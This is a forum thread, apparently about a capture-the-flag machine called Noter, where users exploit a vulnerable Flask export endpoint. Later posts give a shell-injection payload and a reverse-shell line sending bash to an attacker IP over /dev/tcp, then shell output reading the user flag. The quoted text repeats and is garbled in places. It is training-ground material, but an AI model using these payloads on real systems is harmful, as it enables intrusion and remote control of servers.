Posts: 42 Threads: 0 Joined: N/A Can anyone help me to get user in this machine ???? Posts: 20 Threads: 0 Joined: N/A (May 8, 2022, 05:42 PM)just4htb1337 Wrote: (May 8, 2022, 05:30 PM)hackerman Wrote: (May 8, 2022, 05:24 PM)just4htb1337 Wrote: Is this the correct path to user?
```
# Export remote
@app.route('/export_note_remote', methods=['POST'])
@is_logged_in
def export_note_remote():
if check_VIP(session['username']):
try:
url = request.form['url']
status, error = parse_url(url)
if (status is True) and (error is None):
try:
r = pyrequest.get(url,allow_redirects=True)
rand_int = random.randint(1,10000)
command = f"node misc/md-to-pdf.js $'{r.text.strip()}' {rand_int}"
subprocess.run(command, shell=True, executable="/bin/bash")
if os.path.isfile(attachment_dir + f'{str(rand_int)}.pdf'):
return send_file(attachment_dir + f'{str(rand_int)}.pdf', as_attachment=True)
else:
return render_template('export_note.html', error="Error occured while exporting the !")
```
possible https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880
Tried that one as well, but somewhat it didn't work ... could be that am doing it wrongly I can't get any of the notes to export successfully. I get 500 errors on internal and all the remote give me "Error occured while exporting the note!" Posts: 43 Threads: 0 Joined: N/A (May 8, 2022, 06:04 PM)hackerman Wrote: (May 8, 2022, 05:42 PM)just4htb1337 Wrote: (May 8, 2022, 05:30 PM)hackerman Wrote: (May 8, 2022, 05:24 PM)just4htb1337 Wrote: Is this the correct path to user?
```
# Export remote
@app.route('/export_note_remote', methods=['POST'])
@is_logged_in
def export_note_remote():
if check_VIP(session['username']):
try:
url = request.form['url']
status, error = parse_url(url)
if (status is True) and (error is None):
try:
r = pyrequest.get(url,allow_redirects=True)
rand_int = random.randint(1,10000)
command = f"node misc/md-to-pdf.js $'{r.text.strip()}' {rand_int}"
subprocess.run(command, shell=True, executable="/bin/bash")
if os.path.isfile(attachment_dir + f'{str(rand_int)}.pdf'):
return send_file(attachment_dir + f'{str(rand_int)}.pdf', as_attachment=True)
else:
return render_template('export_note.html', error="Error occured while exporting the !")
```
possible https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880
Tried that one as well, but somewhat it didn't work ... could be that am doing it wrongly
I can't get any of the notes to export successfully. I get 500 errors on internal and all the remote give me "Error occured while exporting the note!" Same here... I guess there is something we are missing :dodgy: Posts: 213 Threads: 0 Joined: N/A (May 8, 2022, 06:04 PM)hackerman Wrote: (May 8, 2022, 05:42 PM)just4htb1337 Wrote: (May 8, 2022, 05:30 PM)hackerman Wrote: (May 8, 2022, 05:24 PM)just4htb1337 Wrote: Is this the correct path to user?
```
# Export remote
@app.route('/export_note_remote', methods=['POST'])
@is_logged_in
def export_note_remote():
if check_VIP(session['username']):
try:
url = request.form['url']
status, error = parse_url(url)
if (status is True) and (error is None):
try:
r = pyrequest.get(url,allow_redirects=True)
rand_int = random.randint(1,10000)
command = f"node misc/md-to-pdf.js $'{r.text.strip()}' {rand_int}"
subprocess.run(command, shell=True, executable="/bin/bash")
if os.path.isfile(attachment_dir + f'{str(rand_int)}.pdf'):
return send_file(attachment_dir + f'{str(rand_int)}.pdf', as_attachment=True)
else:
return render_template('export_note.html', error="Error occured while exporting the !")
```
possible https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880
Tried that one as well, but somewhat it didn't work ... could be that am doing it wrongly
I can't get any of the notes to export successfully. I get 500 errors on internal and all the remote give me "Error occured while exporting the note!" I get a 500 error as well. /export_note_remote (the "Export directly from cloud function") looks more promising I think: r = pyrequest.get(url,allow_redirects=True)
rand_int = random.randint(1,10000)
command = f"node misc/md-to-pdf.js
I gave an url like http://10.10.xxx.xxx/test.md (pointing to my own web server) and I could see an incoming connection.{r.text.strip()}' {rand_int}"
subprocess.run(command, shell=True, executable="/bin/bash")
I gave an url like http://10.10.xxx.xxx/test.md (pointing to my own web server) and I could see an incoming connection. Posts: 43 Threads: 0 Joined: N/A (May 8, 2022, 06:10 PM)Exa Wrote: (May 8, 2022, 06:04 PM)hackerman Wrote: (May 8, 2022, 05:42 PM)just4htb1337 Wrote: (May 8, 2022, 05:30 PM)hackerman Wrote: (May 8, 2022, 05:24 PM)just4htb1337 Wrote: Is this the correct path to user?
```
# Export remote
@app.route('/export_note_remote', methods=['POST'])
@is_logged_in
def export_note_remote():
if check_VIP(session['username']):
try:
url = request.form['url']
status, error = parse_url(url)
if (status is True) and (error is None):
try:
r = pyrequest.get(url,allow_redirects=True)
rand_int = random.randint(1,10000)
command = f"node misc/md-to-pdf.js $'{r.text.strip()}' {rand_int}"
subprocess.run(command, shell=True, executable="/bin/bash")
if os.path.isfile(attachment_dir + f'{str(rand_int)}.pdf'):
return send_file(attachment_dir + f'{str(rand_int)}.pdf', as_attachment=True)
else:
return render_template('export_note.html', error="Error occured while exporting the !")
```
possible https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880
Tried that one as well, but somewhat it didn't work ... could be that am doing it wrongly
I can't get any of the notes to export successfully. I get 500 errors on internal and all the remote give me "Error occured while exporting the note!"
I get a 500 error as well.
/export_note_remote (the "Export directly from cloud function") looks more promising I think. When I give an url like http://10.10.xxx.xxx/test.md (pointing to my own web server) then I can control the command string:
r = pyrequest.get(url,allow_redirects=True)
rand_int = random.randint(1,10000)
command = f"node misc/md-to-pdf.js
I tried a test.md which contained "; sleep 10;" but no luck there.
using the export_note I get "Error occured while exporting the note!" .. Import from my web server works fine but no command execution..the payload gets rendered as text in the body field.{r.text.strip()}' {rand_int}" subprocess.run(command, shell=True, executable="/bin/bash") I tried a test.md which contained "; sleep 10;" but no luck there. using the export_note I get "Error occured while exporting the note!" .. Import from my web server works fine but no command execution..the payload gets rendered as text in the body field. Posts: 20 Threads: 0 Joined: N/A (May 8, 2022, 06:10 PM)Exa Wrote: I can't get any of the notes to export successfully. I get 500 errors on internal and all the remote give me "Error occured while exporting the note!"
I get a 500 error as well.
/export_note_remote (the "Export directly from cloud function") looks more promising I think:
r = pyrequest.get(url,allow_redirects=True)
rand_int = random.randint(1,10000)
command = f"node misc/md-to-pdf.js
I gave an url like http://10.10.xxx.xxx/test.md (pointing to my own web server) and I could see an incoming connection.
This is pretty much exactly what I'm doing. Errors with an empty md file{r.text.strip()}' {rand_int}" subprocess.run(command, shell=True, executable="/bin/bash") I gave an url like http://10.10.xxx.xxx/test.md (pointing to my own web server) and I could see an incoming connection. This is pretty much exactly what I'm doing. Errors with an empty md file Posts: 213 Threads: 0 Joined: N/A (May 8, 2022, 06:21 PM)hackerman Wrote: (May 8, 2022, 06:10 PM)Exa Wrote: I can't get any of the notes to export successfully. I get 500 errors on internal and all the remote give me "Error occured while exporting the note!"
I get a 500 error as well.
/export_note_remote (the "Export directly from cloud function") looks more promising I think:
r = pyrequest.get(url,allow_redirects=True)
rand_int = random.randint(1,10000)
command = f"node misc/md-to-pdf.js
I gave an url like http://10.10.xxx.xxx/test.md (pointing to my own web server) and I could see an incoming connection.
This is pretty much exactly what I'm doing. Errors with an empty md file Sorry, didn't see your message. Anyway, I always get "Error occured while exporting the note!" regardless of what my md file contains.{r.text.strip()}' {rand_int}" subprocess.run(command, shell=True, executable="/bin/bash") I gave an url like http://10.10.xxx.xxx/test.md (pointing to my own web server) and I could see an incoming connection. This is pretty much exactly what I'm doing. Errors with an empty md file Sorry, didn't see your message. Anyway, I always get "Error occured while exporting the note!" regardless of what my md file contains. Posts: 213 Threads: 0 Joined: N/A So I think I got code execution. My test.md file contains:
a'; sleep 10; echo 'a Posts: 20 Threads: 0 Joined: N/A (May 8, 2022, 06:37 PM)Exa Wrote: So I think I got code execution. My test.md file contains:
a'; sleep 10; echo 'a nice find, the ' breaks apart $' ' Able to get shell with this Posts: 213 Threads: 0 Joined: N/A (May 8, 2022, 06:40 PM)hackerman Wrote: (May 8, 2022, 06:37 PM)Exa Wrote: So I think I got code execution. My test.md file contains:
a'; sleep 10; echo 'a
nice find, the ' breaks apart $' '
Able to get shell with this So with this I get a reverse shell: a'; bash -i >& /dev/tcp/10.10.xxx.xxx/4000 0>&1; echo 'a
svc@noter:~/app/web$ id
id
uid=1001(svc) gid=1001(svc) groups=1001(svc)
svc@noter:~/app/web$ cat /home/svc/user.txt
Okay, so the MySQL credentials from app_backup_1635803546.zip can be used to connect to port 3306. Anything interesting there? |
